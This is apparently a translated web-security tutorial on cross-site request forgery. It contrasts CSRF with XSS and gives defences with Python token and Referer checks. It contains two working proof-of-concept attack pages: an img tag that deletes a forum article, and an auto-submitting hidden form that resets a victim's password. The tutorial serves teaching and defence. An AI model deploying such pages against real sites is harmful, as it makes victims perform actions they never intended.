CSRF

When you log in to a website, the browser and the site normally establish a session. While that session is alive you can post articles, send mail, delete articles and so on; once the session has ended, any further action is met with a "session expired, please log in again" prompt.

CSRF (client-side cross-site request forgery) is this: the attacker uses some technical trick to make the user's browser visit a site the user has already authenticated to and perform actions there. Put another way, CSRF is the attacker borrowing the victim's cookie to win the server's trust and carry out operations on the victim's behalf.

Neither CSRF nor SSRF can steal cookies.

Difference from XSS

XSS exploits the user's trust in a given website.

CSRF exploits the website's trust in the user's browser.

Exploitation

Preconditions:
  1. The attacker knows every parameter of the URL and what each one means.
  2. The attacker can lure the user into visiting the crafted payload.

  3. Simple authentication only proves that a request came from some user's browser; it cannot prove that the user issued the request deliberately.

Where it is useful:
  1. The operation is meaningful (for example, changing a password).
  2. Validation is too simple (the parameters are fixed, or we can set them ourselves).

GET-type CSRF attack

Suppose the forum www.aa.com deletes an article via a request to a link of the form
http://www.aa.com/opt.php?id=135&act=del&name=Tom
User A is logged in to the forum and owns an article with id=251, so his browser is currently trusted by the forum.
Now a malicious user B builds a page b.html that triggers the request through an src attribute; b.html looks like this:

<html>
<head>
<title>test</title>
</head>
<body>
<img src="http://www.aa.com/opt.php?id=251&act=del&name=A" />
</body>
</html>

B hosts b.html on his own site at http://www.bb.com/b.html

B then sends the link http://www.bb.com/b.html to user A over QQ and lures him into opening it. As soon as A visits the page, his article with id 251 is deleted.

POST-type CSRF attack

Suppose the site www.xx.com lets users change their password but its validation is too simple, as in the screenshot below:

[screenshot of the password-change form omitted]

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>aa</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post">
昵称:<input type="text" name="password" id="password" class="form-control" value="xxxxx">
用户名:<input type="text" name="password" id="password" class="form-control" value="xiaoming">
密码:<input type="password" name="password" id="password" class="form-control" value="">
确认密码:<input type="password" name="cpassword" id="conpassword" class="form-control" value="">
<input type="submit" name="button" value="提交">
</form>
</body>
</html>

We can now build an auto-submitting form page, xxxx.html, with the following content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>test</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post" id="test">
<input type="hidden" name="password" id="password" value="666666">
<input type="hidden" name="cpassword" id="conpassword" value="666666">
</form>
<script type="text/javascript">
window.onload = function(){
document.getElementById('test').submit();
// document.forms[0].submit();
}
</script>
</body>
</html>

Then send the link http://www.bb.com/wwww.html to the user and lure him into clicking it; as soon as he does, his password is changed.

Defence

1. Secondary confirmation (for important operations such as deleting a user or transferring money, pop up a dialog that asks the user to confirm).
2. Token validation
  GET requests: the token can be stored in a cookie.
  POST requests: add a hidden input to the form whose value is the token.
3. Verify the Referer
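The token and Referer defences from the list above, written out as server-side checks. This is an added example, not code from the original post: the session is modelled as a plain dict, SITE_ORIGIN, issue_token, render_form and request_is_legit are names chosen here, and the request is checked against the Origin header first, falling back to Referer.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed value: the origin of the site being defended (the forum in the text).
SITE_ORIGIN = "http://www.aa.com"


def issue_token(session: dict) -> str:
    """Create, or reuse, the per-session CSRF token kept server-side.

    The attacker's page on www.bb.com cannot read this value, so the
    <img> trick and the auto-submitting form both arrive without it.
    """
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def render_form(session: dict) -> str:
    """Embed the token in the state-changing form as a hidden input."""
    token = issue_token(session)
    return (
        '<form action="/opt.php" method="post">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input type="hidden" name="act" value="del">'
        "</form>"
    )


def request_is_legit(session: dict, form: dict, headers: dict) -> tuple:
    """Validate a state-changing request; returns (ok, reason)."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    # compare_digest avoids leaking the token through timing differences.
    if not expected or not hmac.compare_digest(expected, submitted):
        return False, "missing or mismatched token"
    # Second layer: the request must originate from our own site.
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False, "no Origin or Referer header"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False, f"cross-site source {parts.netloc}"
    return True, "ok"
```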

References

https://security.tencent.com/index.php/blog/msg/24
